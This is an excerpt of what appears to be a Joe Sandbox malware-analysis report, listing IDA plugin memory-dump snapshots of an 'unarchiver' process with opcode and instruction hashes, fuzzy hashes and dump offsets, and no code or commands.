                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_1030000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 4fab94156479ee6115d40fa12d880bba332e47c0839e0cb096fe3ea182de9ca8
                                                                                                                                                                                                                                                            • Instruction ID: e78f72a035961ede759f2950be4aa4f54dced11d454e27e844c80a81f64241e0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4fab94156479ee6115d40fa12d880bba332e47c0839e0cb096fe3ea182de9ca8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 17F0D6B65093806FC7118F05DC40863FFE8EF86620708C09FEC498B612D225A804CB71
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599892812.0000000001030000.00000040.00000020.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_1030000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 0258e890d601da700b696be658fc6c51848ed5ed65616931c4c45970efede13f
                                                                                                                                                                                                                                                            • Instruction ID: 72d67ffeae49983b4c1f5a121bc13921eb7a8ef35ed1c8410d83836c0639e79e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0258e890d601da700b696be658fc6c51848ed5ed65616931c4c45970efede13f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 94F082B29492046F9200DF55ED46866F7ECEF84521F04C56AEC488B301E27AB9154AF2
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3600800592.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_4cc0000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: f2a672df3a245fd02847d2eaf93933885653fbe1ba2d9708f42aaf80469f9ed5
                                                                                                                                                                                                                                                            • Instruction ID: 6e05211ae734bd620d094b17f1bbda88bda5aa076fda2cd1f3e4ae2c124cad59
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f2a672df3a245fd02847d2eaf93933885653fbe1ba2d9708f42aaf80469f9ed5
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ADE0DF72F182541FDB44DBBC98441AEBFA29B89120F86887AD008DB242EE308D4283C0
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599892812.0000000001030000.00000040.00000020.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_1030000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 183b5bad4058a2ea678da3ded6d8618cc96c2aeb5b47c5e51e60683b3e9908d5
                                                                                                                                                                                                                                                            • Instruction ID: 4d3607b2cce05c00c8e0ee4d0779e4224386d2012cdf201133426c0b6abe682d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 183b5bad4058a2ea678da3ded6d8618cc96c2aeb5b47c5e51e60683b3e9908d5
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 52E092B66046045B9750CF0AEC81452F7D8EB84630708C07FDD0D8B701D639B504CEA5
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3600800592.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_4cc0000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 5bd7a337192b0d6a99c5dbaeb9a06c451b5bae64216ef56adc2ac53ddf47c879
                                                                                                                                                                                                                                                            • Instruction ID: ae0eac8dd080c8b8f367f19bf0f24531386260e0c71903610c0a414a2a8061bb
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5bd7a337192b0d6a99c5dbaeb9a06c451b5bae64216ef56adc2ac53ddf47c879
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0BD02B31F042181B8B48DBFC9C4816FBBEA9BC0064B428479C408D3301EF309C4187D0
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3600800592.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_4cc0000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 0d9d16133951defdbe14c77880cece7dd628b2e22d4376d361e2d9d76f8ce43b
                                                                                                                                                                                                                                                            • Instruction ID: debcdef974fe84480c23fbb9da29870ab045c8a5fbdb8fc97bdf27acff4778dc
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0d9d16133951defdbe14c77880cece7dd628b2e22d4376d361e2d9d76f8ce43b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F6E0CD7014D344CFDB12837598746993F635BD1204F4581DDD045CF593D524E955D791
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599478581.0000000000E02000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E02000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e02000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 6a55fd9270f126372626d5331a11aa7b0cb00072c6c1a29dfc053abcdb039757
                                                                                                                                                                                                                                                            • Instruction ID: fd59e0c210eaed9b503ad86e10bb4d0a3bc6050267c53dc005b738b7a9b9d636
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6a55fd9270f126372626d5331a11aa7b0cb00072c6c1a29dfc053abcdb039757
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3DD05E792056914FD3169A1CC1A9B963BD4AB51718F4A44FDAC008B7A3C768D9C1E610
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599478581.0000000000E02000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E02000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e02000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: ca9a0d9a20c8913d61df8e5fd7ac21b1be1a869d8c60975c3f1bdc9d38af238b
                                                                                                                                                                                                                                                            • Instruction ID: cc61d7d637552abdfec83163b59de0068ce7e72dc66113bfb8fed0d36fa69568
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ca9a0d9a20c8913d61df8e5fd7ac21b1be1a869d8c60975c3f1bdc9d38af238b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 69D05E342002824BCB15DA1CD6D9F5933D8AB40718F0644ECAC108B2A6C7BCD8C0CA00
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3600800592.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_4cc0000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: e3df412c7391cafe42925ad5e9f3f9db37097e04e9e1bc4608f82b6924d86033
                                                                                                                                                                                                                                                            • Instruction ID: fb4087a8b1a76975e15087059e95d68ff88591b86fe0fc594855e0753693a5bc
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e3df412c7391cafe42925ad5e9f3f9db37097e04e9e1bc4608f82b6924d86033
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C6C01230244204CBD704A7A9D459A2573975BD0308F45C468D4090B255CA70FC81E6C0